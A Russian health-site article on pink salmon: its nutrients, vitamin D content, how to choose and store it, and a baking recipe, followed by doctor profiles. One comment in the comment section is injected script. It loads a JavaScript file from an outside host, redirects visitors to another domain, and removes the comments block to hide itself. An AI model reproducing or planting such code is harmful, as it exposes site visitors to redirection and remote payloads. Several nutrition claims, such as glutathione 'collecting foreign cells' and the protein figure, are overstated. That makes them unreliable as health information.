Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Горбуша. Рыба для иммунит...  >>  Горбуша. Рыба для иммунитета и против ожирения
 
Обратная связь
 

Горбуша. Рыба для иммунитета и против ожирения

Размер шрифта
21 декабря 2011 07:13
  • google_analytics: false
  • Нравится

Горбуша – ценная рыба из семейства лососевых. По количеству витамина D лосось намного превосходит остальные виды рыб, а значит, очень полезен для костей и защищает от остеопороза.

Чем полезна горбуша?
 

  1. Cодержит Омега-3 жирные кислоты, которые снижают уровень холестерина, нормализуют давление, укрепляют оболочку нервных клеток.

  2. Горбуша – источник витамина D, который участвует в формировании костей и помогает кальцию всасываться в кости.

  3. Горбуша богата белком (в 100 г – 60% суточной дозы белка). Рыбный белок гораздо легче усваивается, чем мясной.

  4. Содержит глютотион – вещество, которое собирает вредные чужеродные клетки в организме, обеспечивая нашу иммунную защиту. Имеет антиоксидантные свойства и нормализует работу сердечно-сосудистой системы.

  5. Горбуша не содержит углеводов и сахаров, а значит, полезна людям с сахарным диабетом.

Пьедестал почета по количеству витамина D
1. Лосось – 1628 ед.
2. Горбуша – 959 ед.
3. Кета – 634 ед.

Суточная норма витамина D – 600-1000 единиц, это 100 г горбуши.

Как выбрать

• Цельная рыба должна храниться подо льдом, а филе – на льду.
• Рыба должна пахнуть морем. Рыба не должна быть теплой, тепло для рыбы – смерть!
• При нажатии на мясо не должно оставаться вмятин.
• Глаза у рыбы не должны быть мутными.
• У свежей рыбы всегда красные жабры. Рыба с белыми жабрами хранилась неправильно.
• Из упаковки с замороженной рыбой не должна вытекать вода. Это говорит о том, что рыба гниет, или о том, что горбушу многократно замораживали и размораживали.

Как хранить

• Хранить рыбу лучше в пергаменте или пищевой пленке.
• Если рыба распотрошенная, заложите в брюхо лед и поставьте на самую нижнюю полку в холодильнике. Рыба сохранит свежесть в течение 2-3 дней.
• В морозилке горбушу можно хранить 2-3 недели.

Рецепт запеченной горбуши:

1. Включите духовку и поставьте туда сковороду или поддон для разогрева.
2. Натрите горбушу 2 ч. ложками лимонного сока и специями.
3. Положить горбушу на сковороду (кожа легко отойдет от мяса после приготовления).
4. Через 7 минут проверьте горбушу вилкой на готовность.
5. Готовую рыбу можно приправить соусом сальса.

 

Видеосюжеты по теме:

Горбуша. Младшая сестра лосося
 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.